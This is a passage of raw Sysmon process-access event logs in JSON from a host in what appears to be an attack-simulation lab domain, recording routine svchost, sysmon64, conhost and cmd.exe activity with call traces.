05:46:50.578","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2144,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:50.578\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:50.578","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2145,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:50.578\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:50.578","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2146,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:50.578\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:50.578","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2147,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:50.578\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:50.578","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2148,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:50.578\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:50.578","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2149,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:50.578\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:50.578","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2150,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:50.578\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:50.578","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2151,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:50.578\r\nSourceProcessGUID: {A837DB8D-01C6-5F25-0000-0010F1650300}\r\nSourceProcessId: 3776\r\nSourceThreadId: 3796\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-01CA-5F25-0000-0010C4F80300}\r\nTargetProcessId: 3924\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:50.578","SourceProcessGUID":"{A837DB8D-01C6-5F25-0000-0010F1650300}","SourceProcessId":"3776","SourceThreadId":"3796","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-01CA-5F25-0000-0010C4F80300}","TargetProcessId":"3924","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
